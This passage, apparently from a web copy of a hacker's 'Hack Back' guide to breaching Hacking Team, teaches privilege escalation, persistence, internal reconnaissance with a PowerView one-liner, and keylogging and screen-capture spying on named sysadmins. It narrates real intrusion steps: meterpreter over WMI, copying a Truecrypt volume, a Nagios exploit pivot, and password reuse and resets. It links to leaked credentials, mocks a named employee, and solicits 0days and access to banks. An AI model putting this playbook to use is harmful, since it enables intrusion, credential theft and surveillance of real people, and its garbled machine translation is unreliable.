  606. Any RAT can inject itself into another process, for example the migrate
  607. command in meterpreter and pupy [6], or psinject [7] in powershell empire.
  608. You can inject into the process that has the token you want.
  609. 5) runas
  610. This is sometimes very useful because it does not require administrator
  611. privileges. The command is part of Windows, but if you have no graphical
  612. interface you can use powershell [8].
  613. [1] https://www.indetectables.net/viewtopic.php?p=211165
  614. [2] https://adsecurity.org/?page_id=1821
  615. [3] https://github.com/bidord/pykek
  616. [4] https://adsecurity.org/?p=676
  617. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
  618. [6] https://github.com/n1nj4sec/pupy
  619. [7] http://www.powershellempire.com/?page_id=273
  620. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
  621. ---- [13.2 - Persistence] ----------------------------------------- ------------
  622. Once you have gained access, you want to keep it. Really, persistence
  623. is only a challenge for motherfuckers like those at Hacking Team who want to
  624. hack activists or other individuals. To hack companies, persistence
  625. is not needed, because companies never sleep. I always use "persistence"
  626. in the style of Duqu 2: running in RAM on a couple of servers with high
  627. uptime percentages. In the unlikely event that they all restart at once,
  628. I have passwords and a golden ticket [1] as backup access. You can read
  629. more information on persistence mechanisms for Windows here
  630. [2] [3] [4]. But to hack into companies it is not needed, and it increases the risk of
  631. detection.
  632. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
  633. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
  634. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
  635. [4] https://blog.netspi.com/tag/persistence/
  636. ---- [13.3 - Internal Reconnaissance] ---------------------------------------- ---
  637. The best tool today for understanding Windows networks is PowerView [1].
  638. It is worth reading everything written by its author [2], above all [3], [4], [5] and
  639. [6]. Powershell itself is also very powerful [7]. As there are still many
  640. 2003 and 2000 servers without powershell, you must also learn the old
  641. school [8], with tools like netview.exe [9] or the Windows command
  642. "net view". Other techniques that I like are:
  643. 1) Download a list of file names
  644. With a domain administrator account, you can download all
  645. file names on the network with powerview:
  646. Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ |
  647. select-string '^ (. *) \ t' | % {$ _ Matches -recurse dir [0] .Groups [1]. |
  648. select fullname | files.txt -append out-file}
  649. Later, you can read at your own pace and choose which ones you want to download.
  650. 2) Read mail
  651. As we have seen, mail can be downloaded with powershell, and it holds
  652. lots of useful information.
  653. 3) Read sharepoint
  654. It is another place where many companies keep important information. It can be
  655. downloaded with powershell [10].
  656. 4) Active Directory [11]
  657. It has lots of useful information about users and computers. Even without being
  658. domain administrator, you can already find lots of information with
  659. powerview and other tools [12]. After getting domain
  660. administrator, you should export all the information in AD with csvde or another
  661. tool.
  662. 5) Spying on employees
  663. One of my favorite pastimes is hunting sysadmins. Spying on
  664. Christian Pozzi (sysadmin of Hacking Team) got me access to the
  665. Nagios server, which gave me access to the rete sviluppo (the development network with
  666. the RCS source code). With a simple combination of Get-Keystrokes and
  667. Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from Nishang [14], and
  668. GPO, you can spy on any employee or even the entire domain.
  669. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  670. [2] http://www.harmj0y.net/blog/tag/powerview/
  671. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  672. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
  673. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  674. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
  675. [7] https://adsecurity.org/?p=2535
  676. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
  677. [9] https://github.com/mubix/netview
  678. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
  679. [11] https://adsecurity.org/?page_id=41
  680. [12] http://www.darkoperator.com/?tag=Active+Directory
  681. [13] https://github.com/PowerShellMafia/PowerSploit
  682. [14] https://github.com/samratashok/nishang
  683. - [14 - Hunting Sysadmins] ------------------------------------------ ----------
  684. By reading the documentation of their infrastructure [1], I realized that I still
  685. lacked access to something important - the "Rete Sviluppo", an isolated network
  686. that keeps all the RCS source code. The sysadmins of a company always
  687. have access to everything. I searched the computers of Mauro Romeo and Christian
  688. Pozzi to see how they managed the sviluppo network, and to see if there were other
  689. interesting systems I should investigate. It was easy to access their
  690. computers, since they were part of the Windows domain where I had
  691. administrator. Mauro Romeo's computer had no open ports,
  692. so I opened the WMI port [2] in order to execute meterpreter [3]. In addition to
  693. logging keystrokes and screen captures with Get-Keystrokes and Get-TimedScreenshot, I used many
  694. /gather/ modules of metasploit, CredMan.ps1 [4], and searched for files [5]. Seeing
  695. that Pozzi had a Truecrypt volume, I waited until he had mounted it and
  696. then copied the files. Many have laughed at the weak passwords of
  697. Christian Pozzi (and at Christian Pozzi in general, who provides plenty of material
  698. for comedy [6] [7] [8] [9]). I included them in the leak as an oversight and
  699. to laugh at him. The reality is that mimikatz and keyloggers see all
  700. passwords the same.
  701. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
  702. [2] http://www.hammer-software.com/wmigphowto.shtml
  703. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
  704. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
  705. [5] http://pwnwiki.io/#!presence/windows/find_files.md
  706. [6] http://archive.is/TbaPy
  707. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
  708. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
  709. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
  710. - [15 - The Bridge] ------------------------------------------ ------------------
  711. Inside Christian Pozzi's encrypted volume there was a text file with many
  712. passwords [1]. One of them was for a Fully Automated Nagios server,
  713. which had access to the sviluppo network in order to monitor it. I had found
  714. the bridge. I only had the password for the web interface, but there was a
  715. public exploit [2] to execute code and get a shell (it is an
  716. unauthenticated exploit, but it requires that a user has a session open, for which
  717. I used the password from the text file).
  718. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
  719. [2] http://seclists.org/fulldisclosure/2014/Oct/78
  720. - [16 - Reusing and restoring passwords] ----------------------------
  721. Reading the mail, I had seen Daniele Milan granting access to
  722. git repositories. I already had his Windows password thanks to mimikatz. I
  723. tried it on the git server and it worked. I tried sudo and it worked. For the
  724. gitlab server and his twitter account, I used the "I forgot my
  725. password" function and my access to the mail server to reset the
  726. password.
  727. - [17 - Conclusion] ------------------------------------------- ----------------
  728. It is done. So easy it is to tear down a company and stop their abuses
  729. human rights. That is the beauty and the asymmetry of hacking: with only a hundred
  730. hours of work, one person can undo years of work of a
  731. multimillion-dollar company. The hacking gives us the possibility of the dispossessed
  732. fight and win.
  733. Hacking guides often end with a warning: This information is
  734. only for educational purposes, I am an ethical hacker, not attacks on computers without
  735. permission, gobbledygook. I will say the same, but with a more rebellious concept
  736. hacking "ethical". Filter ethical hacking documents would expropriate money
  737. banks, and protect computers of ordinary people. However, the
  738. Most people who call themselves "ethical hackers" work only
  739. to protect those who pay their consulting fee, which often are the
  740. they most deserve to be hacked.
  741. Hacking Team is see themselves as part of a tradition of inspiring
  742. Italian [1] design. I see them Vincenzetti, your company, and their cronies
  743. police, police, and government, as part of a long tradition of
  744. Italian fascism. I want to dedicate this guide to the victims of the assault on the
  745. Armando Diaz school, and all those who have shed their blood on hands
  746. Italian fascists.
  747. [1] https://twitter.com/coracurrier/status/618104723263090688
  748. - [18 - Contact] ------------------------------------------- ------------------
  749. To send spearphishing attempts, death threats written in
  750. Italian [1] [2] and to give me 0days or access within banks,
  751. corporations, governments etc.
  752. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
  753. [2] https://twitter.com/CthulhuSec/status/619459002854977537
  754. porfa only encrypted mails:
  755. https://securityinabox.org/es/thunderbird_usarenigmail
  756. -----BEGIN PGP PUBLIC KEY BLOCK-----
  757. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
  758. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
  759. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
  760. +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
  761. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
  762. Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
  763. Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
  764. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
  765. QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
  766. cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
  767. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
  768. 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
  769. X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
  770. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
  771. oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
  772. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
  773. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
  774. WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
  775. jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
  776. CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
  777. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
  778. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
  779. JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
  780. Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
  781. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
  782. =E5+y
  783. -----END PGP PUBLIC KEY BLOCK-----
  784. If not you, who? If not now, when?
  785. _ _ _ ____ _ _
  786. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  787. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  788. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  789. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  790. </code> </pre>
  791. </p>
  792. </div>
  793. </div>
  794. <hr>
  795. <footer>
  796. <p>CC BY-NC</p>
  797. </footer>
  798. </div> <!-- /container -->
  799. <!-- Le javascript
  800. ================================================== -->
  801. <!-- Placed at the end of the document so the pages load faster -->
  802. <script src="js/jquery.js"></script>
  803. <script src="js/bootstrap-386.js"></script>
  804. <script src="js/bootstrap-transition.js"></script>
  805. <script src="js/bootstrap-alert.js"></script>
  806. <script src="js/bootstrap-modal.js"></script>
  807. <script src="js/bootstrap-dropdown.js"></script>
  808. <script src="js/bootstrap-scrollspy.js"></script>
  809. <script src="js/bootstrap-tab.js"></script>
  810. <script src="js/bootstrap-tooltip.js"></script>
  811. <script src="js/bootstrap-popover.js"></script>
  812. <script src="js/bootstrap-button.js"></script>
  813. <script src="js/bootstrap-collapse.js"></script>
  814. <script src="js/bootstrap-carousel.js"></script>
  815. <script src="js/bootstrap-typeahead.js"></script>
  816. <script src="js/bootstrap-affix.js"></script>
  817. <script>
  818. _386 = { onePass: true, speedFactor: 0.825 };
  819. </script>
  820. </body>
  821. </html>